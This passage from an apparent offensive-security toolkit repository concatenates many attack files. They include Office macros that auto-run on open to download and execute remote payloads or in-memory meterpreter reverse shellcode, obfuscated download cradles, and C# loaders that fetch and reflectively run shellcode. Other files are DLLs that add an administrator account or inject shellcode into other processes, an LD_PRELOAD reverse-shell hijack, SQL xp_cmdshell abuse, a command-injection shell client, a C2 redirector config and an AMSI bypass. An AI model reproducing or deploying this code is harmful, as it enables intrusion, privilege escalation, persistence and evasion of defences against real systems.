9 | $sqlCmd.Connection = $sqlConnection
10 |
11 | $sqlCmd.CommandText = 'SELECT 1 FROM openquery("{0}",''SELECT 1; EXEC sp_configure ''''show advanced options'''', 1; RECONFIGURE;'')' -f $Link
12 | $reader = $sqlCmd.ExecuteReader()
13 | $reader.Close()
14 |
15 | $sqlCmd.CommandText = 'SELECT 1 FROM openquery("{0}",''SELECT 1;EXEC sp_configure ''''xp_cmdshell'''', 1; RECONFIGURE;'')' -f $Link
16 | $reader = $sqlCmd.ExecuteReader()
17 | $reader.Close()
18 |
19 | $sqlCmd.CommandText = 'SELECT 1 FROM openquery("{0}",''SELECT 1;EXEC xp_cmdshell ''''{1}'''';'')' -f $Link,$Command
20 | $reader = $sqlCmd.ExecuteReader()
21 | while ($reader.Read()){
22 | $reader[0]
23 | }
24 | $reader.Close()
25 | $sqlConnection.Close()
26 |
--------------------------------------------------------------------------------
/csharp/SharpHttpFetch.cs:
--------------------------------------------------------------------------------
1 | // base64 -w 0 payload.bin > /var/www/html/robots.txt
2 | public static byte[] GetShellcode(string url)
3 | {
4 | try
5 | {
6 | // fuck ciphers
7 | ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072;
8 | WebClient client = new WebClient();
9 | // hood up
10 | client.Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36");
11 | // yeah yeah
12 | ServicePointManager.ServerCertificateValidationCallback = delegate { return true; };
13 | client.Proxy = WebRequest.GetSystemWebProxy();
14 | client.Proxy.Credentials = CredentialCache.DefaultCredentials;
15 | string compressedEncodedShellcode = client.DownloadString(url);
16 | return Convert.FromBase64String(compressedEncodedShellcode);
17 | }
18 | catch (Exception e)
19 | {
20 | Console.Error.WriteLine(e.Message + Environment.NewLine + e.StackTrace);
21 | var ret = new byte[] { 0xC3 };
22 | return ret;
23 | }
24 | }
--------------------------------------------------------------------------------
/csharp/GzipBuffer.cs:
--------------------------------------------------------------------------------
1 | using System;
2 |
3 | namespace PoCBinZip
4 | {
5 | class Program
6 | {
7 | static void Main(string[] args)
8 | {
9 | byte[] buf = Decompress(compressedSC);
10 |
11 | return;
12 | }
13 | public static byte[] Compress(byte[] data)
14 | {
15 | var compressedStream = new MemoryStream();
16 | using (var gzipStream = new GZipStream(compressedStream, CompressionMode.Compress, false))
17 | {
18 | gzipStream.Write(data, 0, data.Length);
19 | }
20 |
21 | return compressedStream.ToArray();
22 | }
23 |
24 | public static byte[] Decompress(byte[] compressedData)
25 | {
26 | var uncompressedStream = new MemoryStream();
27 |
28 | using (var compressedStream = new MemoryStream(compressedData))
29 | using (var gzipStream = new GZipStream(compressedStream, CompressionMode.Decompress))
30 | {
31 | gzipStream.CopyTo(uncompressedStream);
32 | }
33 |
34 | return uncompressedStream.ToArray();
35 | }
36 | }
37 | }
--------------------------------------------------------------------------------
/wsh/DownloadAlt.vb:
--------------------------------------------------------------------------------
1 | Sub Wait(n As Long)
2 | Dim t As Date
3 | t = Now
4 | Do
5 | DoEvents
6 | Loop Until Now >= DateAdd("s", n, t)
7 | End Sub
8 |
9 | Sub Execute()
10 | Dim ret
11 | Dim o
12 | Set ret = VBA.CreateObject("WScript.Shell")
13 | o = ret.Run("cscript c:\\windows\\tasks\\main.js")
14 | End Sub
15 |
16 | Sub RemoteFetch()
17 | filepath = "c:\\windows\\tasks\\main.js"
18 | URL = "http://g.somesec.xyz/js/main.js"
19 |
20 | Set xhr = CreateObject("Msxml2.ServerXMLHTTP.6.0")
21 | With xhr
22 | .Open "GET", URL, False
23 | .Send
24 | End With
25 | Wait (2)
26 | If xhr.Status = 200 Then
27 | Set fso = CreateObject("Scripting.FileSystemObject")
28 | If fso.FileExists(filepath) Then fso.DeleteFile (filepath)
29 |
30 | Set stream = CreateObject("ADODB.Stream")
31 | stream.Open
32 | stream.Type = 1
33 | stream.Write (xhr.ResponseBody)
34 | stream.Position = 0
35 | stream.SaveToFile (filepath)
36 | stream.Close
37 |
38 | Execute
39 | End If
40 | End Sub
41 |
42 | Sub AutoOpen()
43 | RemoteFetch
44 | End Sub
--------------------------------------------------------------------------------
/msbuild/WorkflowCompiler-Reflective-PE-Runner.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net;
3 | using System.Reflection;
4 | using System.Text;
5 | using System.Threading;
6 | using System.Workflow.ComponentModel;
7 |
8 | public class Run : Activity{
9 | public Run() {
10 | Console.WriteLine("I executed!");
11 |
12 | byte[] bytes = GetShellcode("http://192.168.49.83/main");
13 |
14 | var assembly = Assembly.Load(bytes);
15 | MethodInfo method = assembly.EntryPoint;
16 | if (method != null)
17 | {
18 | method.Invoke(null, new object[] { new string[] { } });
19 | }
20 | }
21 | public static byte[] GetShellcode(string url)
22 | {
23 | WebClient client = new WebClient();
24 | // what be the user agent?
25 | // Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36");
26 | client.Proxy = WebRequest.GetSystemWebProxy();
27 | client.Proxy.Credentials = CredentialCache.DefaultCredentials;
28 | string compressedEncodedShellcode = client.DownloadString(url);
29 | return Convert.FromBase64String(compressedEncodedShellcode);
30 | }
31 | }
--------------------------------------------------------------------------------
/csharp/Reflective-Dll-Runner.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net;
3 | using System.Reflection;
4 | using System.Text;
5 |
6 | namespace test
7 | {
8 | class Program
9 | {
10 | static void Main(string[] args)
11 | {
12 | byte[] dll = GetShellcode("http://192.168.49.83/main");
13 |
14 | Assembly SampleAssembly = Assembly.Load(dll);
15 |
16 | Type t = SampleAssembly.GetType("ManagedClass.Class1");
17 |
18 | var staticMethod = t.GetMethod("runner");
19 |
20 | staticMethod.Invoke(null, null);
21 | }
22 | public static byte[] GetShellcode(string url)
23 | {
24 | WebClient client = new WebClient();
25 | // what be the user agent?
26 | // Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36");
27 | client.Proxy = WebRequest.GetSystemWebProxy();
28 | client.Proxy.Credentials = CredentialCache.DefaultCredentials;
29 | string compressedEncodedShellcode = client.DownloadString(url);
30 | return Convert.FromBase64String(compressedEncodedShellcode);
31 | }
32 | }
33 | }
34 |
--------------------------------------------------------------------------------
/csharp/Reflective-PE-Runner.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net;
3 | using System.Reflection;
4 | using System.Text;
5 | using System.Threading;
6 |
7 | namespace test
8 | {
9 | class Program
10 | {
11 | static void Main(string[] args)
12 | {
13 | byte[] bytes = GetShellcode("http://192.168.49.83/main");
14 |
15 | var assembly = Assembly.Load(bytes);
16 | MethodInfo method = assembly.EntryPoint;
17 | if (method != null)
18 | {
19 | method.Invoke(null, new object[] { new string[] { } });
20 | }
21 | }
22 | public static byte[] GetShellcode(string url)
23 | {
24 | WebClient client = new WebClient();
25 | // what be the user agent?
26 | // Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36");
27 | client.Proxy = WebRequest.GetSystemWebProxy();
28 | client.Proxy.Credentials = CredentialCache.DefaultCredentials;
29 | string compressedEncodedShellcode = client.DownloadString(url);
30 | return Convert.FromBase64String(compressedEncodedShellcode);
31 | }
32 | }
33 | }
34 |
--------------------------------------------------------------------------------
/wsh/InMemoryWin32CreateThread.vb:
--------------------------------------------------------------------------------
1 | Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
2 |
3 | Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
4 |
5 | Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
6 |
7 | Function MyMacro()
8 | Dim buf As Variant
9 | Dim addr As LongPtr
10 | Dim counter As Long
11 | Dim data As Long
12 | Dim res As Long
13 |
14 | ' msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.49.83 LPORT=443 EXITFUNC=thread -f vbapplication
15 | buf = Array(232,[...],213)
16 |
17 | addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
18 |
19 | For counter = LBound(buf) To Ubound(buf)
20 | data = buf(counter)
21 | res = RtlMoveMemory(addr + counter, data, 1)
22 | Next counter
23 |
24 | res = CreateThread(0, 0, addr, 0, 0, 0)
25 | End Function
26 |
27 | Sub Document_Open()
28 | MyMacro
29 | End Sub
30 |
31 | Sub AutoOpen()
32 | MyMacro
33 | End Sub
34 |
--------------------------------------------------------------------------------
/csharp/Guardrail-MininumBrowsersChecker.cs:
--------------------------------------------------------------------------------
1 | /*
2 | Minimum number of browsers, C#
3 | Module written by Brandon Arvanaghi
4 | Website: arvanaghi.com
5 | Twitter: @arvanaghi
6 |
7 | modified: @thelikes_
8 | */
9 |
10 | using System;
11 | using Microsoft.Win32;
12 |
13 | namespace MinimumNumBrowsersChecker
14 | {
15 | class Program
16 | {
17 | public static bool Check(int num)
18 | {
19 | int browserCount = 0;
20 | string[] browserKeys = { @"SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe", @"SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe", @"SOFTWARE\Mozilla" };
21 |
22 | foreach (string browserKey in browserKeys)
23 | {
24 | RegistryKey OpenedKey = Registry.LocalMachine.OpenSubKey(browserKey, false);
25 | if (OpenedKey != null)
26 | {
27 | browserCount += 1;
28 | }
29 | }
30 |
31 | if (browserCount >= num)
32 | {
33 | Console.WriteLine("Proceed!");
34 | return true;
35 | }
36 | else
37 | {
38 | Console.WriteLine("Number of Browsers: {0}", browserCount);
39 | return false;
40 | }
41 | }
42 | }
43 | }
--------------------------------------------------------------------------------
/conf/nginx-redirector.conf:
--------------------------------------------------------------------------------
1 | # Hide nginx version
2 | server_tokens off;
3 |
4 | server {
5 | listen 443 ssl;
6 | server_name attacker.com;
7 |
8 | root /var/www/html;
9 |
10 | # Remove X-Powered-By, Server, X-AspNet-Version headers
11 | more_clear_headers 'Server';
12 | more_clear_headers 'X-Powered-By';
13 |
14 | ssl_certificate /etc/letsencrypt/live/attacker.com/fullchain.pem;
15 | ssl_certificate_key /etc/letsencrypt/live/attacker.com/privkey.pem;
16 |
17 | # SSL configuration (if using HTTPS)
18 | ssl_session_timeout 1d;
19 | ssl_session_cache shared:SSL:50m;
20 | ssl_session_tickets off;
21 |
22 | # Modern SSL configuration
23 | ssl_protocols TLSv1.2 TLSv1.3;
24 | ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305;
25 | ssl_prefer_server_ciphers off;
26 |
27 | # Disable directory listing
28 | autoindex off;
29 |
30 | location /dashboard {
31 | proxy_pass https://c2.attacker.com:31433 ;
32 | proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
33 | }
34 |
35 | location /api {
36 | proxy_pass http://c2.attacker.com:7001 ;
37 | proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
38 | }
39 | }
40 |
--------------------------------------------------------------------------------
/misc/HtmlSmuggling.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
33 |
34 |
--------------------------------------------------------------------------------
/csharp/AddUserAdmin.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.DirectoryServices;
3 |
4 | namespace SharpAddUser
5 | {
6 | class Program
7 | {
8 | static void Main(string[] args)
9 | {
10 | try
11 | {
12 | DirectoryEntry AD = new DirectoryEntry("WinNT://" +
13 | Environment.MachineName + ",computer");
14 | DirectoryEntry NewUser = AD.Children.Add("ahacker", "user");
15 | NewUser.Invoke("SetPassword", new object[] { "Passw0rd!" });
16 | NewUser.Invoke("Put", new object[] { "Description", "Test User from .NET" });
17 | NewUser.CommitChanges();
18 | DirectoryEntry grp;
19 |
20 | grp = AD.Children.Find("Guests", "group");
21 | if (grp != null) { grp.Invoke("Add", new object[] { NewUser.Path.ToString() }); }
22 |
23 | grp = AD.Children.Find("Administrators", "group");
24 | if (grp != null) { grp.Invoke("Add", new object[] { NewUser.Path.ToString() }); }
25 |
26 | Console.WriteLine("[>] Account Created Successfully");
27 | }
28 | catch (Exception ex)
29 | {
30 | Console.WriteLine(ex.Message);
31 | Console.ReadLine();
32 | }
33 | }
34 | }
35 | }
--------------------------------------------------------------------------------
/wsh/RunnerDecimalObfsNameCheck.vb:
--------------------------------------------------------------------------------
1 | Function Pears(Beets)
2 | Pears = Chr(Beets - 17)
3 | End Function
4 |
5 | Function Strawberries(Grapes)
6 | Strawberries = Left(Grapes, 3)
7 | End Function
8 |
9 | Function Almonds(Jelly)
10 | Almonds = Right(Jelly, Len(Jelly) - 3)
11 | End Function
12 |
13 | Function Nuts(Milk)
14 | Do
15 | Oatmilk = Oatmilk + Pears(Strawberries(Milk))
16 | Milk = Almonds(Milk)
17 | Loop While Len(Milk) > 0
18 | Nuts = Oatmilk
19 | End Function
20 |
21 | Function MyMacro()
22 | ' check for doc name of "runner.doc"
23 | If ActiveDocument.Name <> Nuts("131134127127118131063117128116") Then
24 | Exit Function
25 | End If
26 |
27 | Dim Apples As String
28 | Dim Water As String
29 | ' download cradle (encrypted with "caesar-cradle-encoder.ps1")
30 | Apples = "129128136118131132121118125125049062118137118116049115138129114132132049062127128129049062136049121122117117118127049062116049122118137057057127118136062128115123118116133049132138132133118126063127118133063136118115116125122118127133058063117128136127125128114117132133131122127120057056121133133129075064064066074067063066071073063069074063073068064131134127063133137133056058058"
31 | Water = Nuts(Apples)
32 | GetObject(Nuts("136122127126120126133132075")).Get(Nuts("104122127068067112097131128116118132132")).Create Water, Tea, Coffee, Napkin
33 | End Function
34 |
35 | Sub AutoOpen()
36 | MyMacro
37 | End Sub
38 |
--------------------------------------------------------------------------------
/c/exec_dll-apientry.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | // source:https://github.com/Mr-Un1k0d3r/DLLsForHackers/blob/master/templates/exec.c
5 | // compile: "c:\Program Files\CodeBlocks\MinGW\bin\g++.exe" -Wall -DBUILD_DLL -O2 -c exec_dll-64.c -o output/exec_dll-64.o && "c:\Program Files\CodeBlocks\MinGW\bin\g++.exe" -shared -Wl,--dll output/exec_dll-64.o -o output/exec_dll-64.dll
6 |
7 | #ifdef BUILD_DLL
8 | #define DLL_EXPORT __declspec(dllexport)
9 | #else
10 | #define DLL_EXPORT __declspec(dllimport)
11 | #endif
12 |
13 | BOOL running = FALSE;
14 |
15 | void DLL_EXPORT initCallback()
16 | {
17 | if(!running) {
18 | system("cmd.exe /c net user hacker Password123! /add");
19 | system("cmd.exe /c net localgroup administrators hacker /add");
20 | running = TRUE;
21 | }
22 |
23 | }
24 |
25 | extern "C" DLL_EXPORT BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
26 | {
27 | switch (fdwReason)
28 | {
29 | case DLL_PROCESS_ATTACH:
30 | initCallback();
31 | break;
32 |
33 | case DLL_PROCESS_DETACH:
34 | initCallback();
35 | break;
36 |
37 | case DLL_THREAD_ATTACH:
38 | initCallback();
39 | break;
40 |
41 | case DLL_THREAD_DETACH:
42 | initCallback();
43 | break;
44 | }
45 | return TRUE;
46 | }
--------------------------------------------------------------------------------
/cpp/DllScInject.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "pch.h"
3 | #include
4 | #include
5 | #include
6 |
7 | /* POC exec shellcode in unmanaged dll
8 | * source: https://github.com/theevilbit/injection
9 | * @thelikes
10 | */
11 |
12 | extern "C" __declspec(dllexport) void sploit()
13 | {
14 | unsigned char shellcode[] ="\xfc\xe8\x8f\x00";
15 |
16 | HANDLE processHandle;
17 | HANDLE remoteThread;
18 | PVOID remoteBuffer;
19 |
20 | processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi("1108")));
21 | remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
22 | WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
23 | remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
24 | CloseHandle(processHandle);
25 | }
26 |
27 | BOOL APIENTRY DllMain( HMODULE hModule,
28 | DWORD ul_reason_for_call,
29 | LPVOID lpReserved
30 | )
31 | {
32 | switch (ul_reason_for_call)
33 | {
34 | case DLL_PROCESS_ATTACH:
35 | sploit();
36 | break;
37 | case DLL_THREAD_ATTACH:
38 | break;
39 | case DLL_THREAD_DETACH:
40 | break;
41 | case DLL_PROCESS_DETACH:
42 | break;
43 | }
44 | return TRUE;
45 | }
46 |
47 |
--------------------------------------------------------------------------------
/wsh/DownloadExec.vb:
--------------------------------------------------------------------------------
1 | Sub MyMacro()
2 | Dim URL As String
3 | Dim filepath As String
4 |
5 | filepath = "c:\\windows\\tasks\\librun.xml"
6 | URL = "http://10.10.14.5:8080/librun.xml"
7 |
8 | Set xhr = CreateObject("MSXML2.XMLHTTP")
9 | With xhr
10 | .Open "GET", URL, False
11 | .Send
12 | End With
13 |
14 | If xhr.Status = 200 Then
15 | Set fso = CreateObject("Scripting.FileSystemObject")
16 | If fso.FileExists(filepath) Then fso.DeleteFile (filepath)
17 |
18 | Set stream = CreateObject("ADODB.Stream")
19 | stream.Open
20 | stream.Type = 1
21 | stream.Write (xhr.ResponseBody)
22 | stream.Position = 0
23 | stream.SaveToFile (filepath)
24 | stream.Close
25 |
26 | ' Shell "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe c:\\windows\\tasks\\librun.xml", vbHide
27 |
28 | Dim wsh As Object
29 | Set wsh = VBA.CreateObject("WScript.Shell")
30 | Dim waitOnReturn As Boolean: waitOnReturn = True
31 | Dim windowStyle As Integer: windowStyle = 1
32 | wsh.Run "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe c:\\windows\\tasks\\librun.xml", 1, True
33 |
34 | 'Dim ws As Object
35 | 'Set ws = CreateObject("WScript.Shell")
36 | 'With ws.Exec("C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe c:\\windows\\tasks\\librun.xml")
37 | ' .StdIn.WriteBlankLines 1
38 | ' .Terminate
39 | 'End With
40 | End If
41 |
42 | End Sub
--------------------------------------------------------------------------------
/py/request_shell.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import requests
3 | import sys
4 | import readline
5 |
6 | def RunCmd(cmd):
7 | # Add proxy support (eg. BURP to analyze HTTP(s) traffic)
8 | # set verify = False if your proxy certificate is self signed
9 | # remember to set proxies both for http and https
10 | #
11 | # example:
12 | #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
13 | #verify = False
14 | proxies = {}
15 | verify = True
16 |
17 | # Headers
18 | headers = {
19 | 'Host': 'victim.com',
20 | 'Accept-Encoding': 'gzip, deflate',
21 | 'Accept': '*/*',
22 | 'Accept-Language': 'en',
23 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
24 | 'Connection': 'close',
25 | }
26 |
27 | # Data
28 | data = r''''''
29 |
30 | # Cookies
31 | cookies = {
32 | }
33 |
34 | buildurl='https://victim.com/ping.php?ip=zzz;{}'.format(cmd)
35 |
36 | # Prepare and send request
37 | req = requests.Request(
38 | method='GET',
39 | url=buildurl,
40 | headers=headers,
41 | data=data,
42 | cookies=cookies,
43 | )
44 | prepared_req = req.prepare()
45 | session = requests.Session()
46 | resp = session.send(prepared_req, proxies=proxies)
47 | #print(resp.text)
48 | for line in resp.text.splitlines():
49 | if not line.startswith("<"):
50 | print(line)
51 |
52 | while True:
53 | cmd = input('> ')
54 | if cmd == "exit" or cmd == "quit":
55 | sys.exit(0)
56 |
57 | RunCmd(cmd)
58 |
--------------------------------------------------------------------------------
/msbuild/MSBuild-RunspaceBypass-x64.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
9 |
10 |
11 |
12 | results = ps.Invoke();
38 | foreach (var result in results)
39 | {
40 | Console.WriteLine(result);
41 | }
42 | rs.Close();
43 | return true;
44 | }
45 | }
46 | ]]>
47 |
48 |
49 |
50 |
--------------------------------------------------------------------------------
/csharp/ClassSayMyName.cs:
--------------------------------------------------------------------------------
1 | using System;
2 |
3 | /*
4 | * Class to extract remote payload URL from pe/lib filename.
5 | */
6 | namespace SayMyName
7 | {
8 | public class ParseRemote
9 | {
10 | /*
11 | * proceed:
12 | * [>] filename: evil_10.10.14.5_8080.exe
13 | * [>] words count: 3
14 | * [>] word: esmb
15 | * [>] word: 10.10.14.5
16 | * [>] word: 8080.exe
17 | */
18 | public static string GetUrl(string binName)
19 | {
20 | string ipAddr = "0.0.0.0";
21 | string ipPort = "80";
22 |
23 | if (binName.Contains("_"))
24 | {
25 | string[] words = binName.Split('_');
26 |
27 | /*Console.WriteLine("[>] words count: " + words.Length);
28 | foreach (var word in words)
29 | {
30 | System.Console.WriteLine("[>] word: " + word);
31 | }*/
32 |
33 | if (words.Length == 3)
34 | {
35 | ipAddr = words[1];
36 | ipPort = words[2].Split('.')[0];
37 | }
38 | }
39 | else
40 | {
41 | Console.WriteLine("[!] Unknown remote");
42 | }
43 |
44 |
45 | return BuildUrl(ipAddr, ipPort);
46 | }
47 | public static string BuildUrl(string addr, string port)
48 | {
49 | string uri = "";
50 | string proto = "";
51 |
52 | if (port.Contains("443"))
53 | {
54 | proto = "https";
55 | }
56 | else
57 | {
58 | proto = "http";
59 | }
60 |
61 | uri = proto + "://" + addr + ":" + port;
62 |
63 | return uri;
64 | }
65 | }
66 | }
67 |
--------------------------------------------------------------------------------
/wsh/InMemoryWin32CreateThread-SleepyCaesar.vb:
--------------------------------------------------------------------------------
1 | Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
2 |
3 | Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
4 |
5 | Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
6 |
7 | Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long
8 |
9 | Function MyMacro()
10 | Dim buf As Variant
11 | Dim addr As LongPtr
12 | Dim counter As Long
13 | Dim data As Long
14 | Dim res As Long
15 | ' sleep
16 | Dim t1 As Date
17 | Dim t2 As Date
18 | Dim time As Long
19 |
20 | t1 = Now()
21 | Sleep (2000)
22 | t2 = Now()
23 | time = DateDiff("s", t1, t2)
24 | If time < 2 Then
25 | Exit Function
26 | End If
27 |
28 | ' msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.49.83 LPORT=443 EXITFUNC=thread -f vbapplication
29 | ' C:\Tools\LikesEncoder\bin\Debug\LikesEncoder.exe Z:\meterp-https-x86.bin vba
30 | buf = Array(254, [...], 215)
31 |
32 | For i = 0 To UBound(buf)
33 | buf(i) = buf(i) - 2
34 | Next i
35 |
36 | addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
37 |
38 | For counter = LBound(buf) To UBound(buf)
39 | data = buf(counter)
40 | res = RtlMoveMemory(addr + counter, data, 1)
41 | Next counter
42 |
43 | res = CreateThread(0, 0, addr, 0, 0, 0)
44 | End Function
45 |
46 | Sub Document_Open()
47 | MyMacro
48 | End Sub
49 |
50 | Sub AutoOpen()
51 | MyMacro
52 | End Sub
--------------------------------------------------------------------------------
/csharp/ScRunner.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net;
3 | using System.Runtime.InteropServices;
4 |
5 | namespace SharpSCRunner
6 | {
7 | class Program
8 | {
9 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
10 | static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
11 |
12 | [DllImport("kernel32.dll")]
13 | static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
14 |
15 | [DllImport("kernel32.dll")]
16 | static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
17 |
18 | static void Main(string[] args)
19 | {
20 | byte[] buf = GetShellcode("http://192.168.49.83/account");
21 |
22 | int size = buf.Length;
23 |
24 | IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)size, 0x3000, 0x40);
25 |
26 | Marshal.Copy(buf, 0, addr, size);
27 |
28 | IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
29 |
30 | WaitForSingleObject(hThread, 0xFFFFFFFF);
31 | }
32 | public static byte[] GetShellcode(string url)
33 | {
34 | WebClient client = new WebClient();
35 | // what be the user agent?
36 | // Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36");
37 | client.Proxy = WebRequest.GetSystemWebProxy();
38 | client.Proxy.Credentials = CredentialCache.DefaultCredentials;
39 | string compressedEncodedShellcode = client.DownloadString(url);
40 | return Convert.FromBase64String(compressedEncodedShellcode);
41 | }
42 | }
43 | }
44 |
--------------------------------------------------------------------------------
/c/SharedPreLoad.c:
--------------------------------------------------------------------------------
1 | #define _GNU_SOURCE
2 | #include // for mprotect
3 | #include
4 | #include
5 | #include
6 | #include
7 |
8 | unsigned char buf[] =
9 | "\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
10 | "\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51\x6a\x0a"
11 | "\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05"
12 | "\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00\x1f\x90\xc0\xa8"
13 | "\x31\x53\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x59"
14 | "\x48\x85\xc0\x79\x25\x49\xff\xc9\x74\x18\x57\x6a\x23\x58\x6a"
15 | "\x00\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x59\x59\x5f\x48"
16 | "\x85\xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e"
17 | "\x5a\x0f\x05\x48\x85\xc0\x78\xed\xff\xe6";
18 |
19 | uid_t geteuid(void)
20 | {
21 | // set pointer type to old geteuid
22 | typeof(geteuid) *old_geteuid;
23 |
24 | // get memory addr of original
25 | old_geteuid = dlsym(RTLD_NEXT, "geteuid");
26 |
27 | // fork & run
28 | if (fork() == 0)
29 | {
30 | // we're running inside our newly created child process, run shell
31 | intptr_t pagesize = sysconf(_SC_PAGESIZE);
32 | if (mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)),pagesize, PROT_READ|PROT_EXEC))
33 | {
34 | perror("mprotect");
35 | return -1;
36 | }
37 | int (*ret)() = (int(*)())buf;
38 | ret();
39 | }
40 | else
41 | {
42 | // otherwise return expected value of geteuid to continue running as intended
43 | printf("HACK: returning from function...\n");
44 | return (*old_geteuid)();
45 | }
46 |
47 | printf("HACK: Returning from main...\n");
48 | return -2;
49 | }
--------------------------------------------------------------------------------
/psh/AmsiBypass-AmsiOpenSession.ps1:
--------------------------------------------------------------------------------
1 | function LookupFunc {
2 |
3 | Param ($moduleName, $functionName)
4 |
5 | $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
6 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
7 | $tmp=@()
8 | $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
9 | return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,@($moduleName)), $functionName))
10 | }
11 |
12 | function getDelegateType {
13 | Param (
14 | [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
15 | [Parameter(Position = 1)] [Type] $delType = [Void]
16 | )
17 |
18 | $type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])
19 |
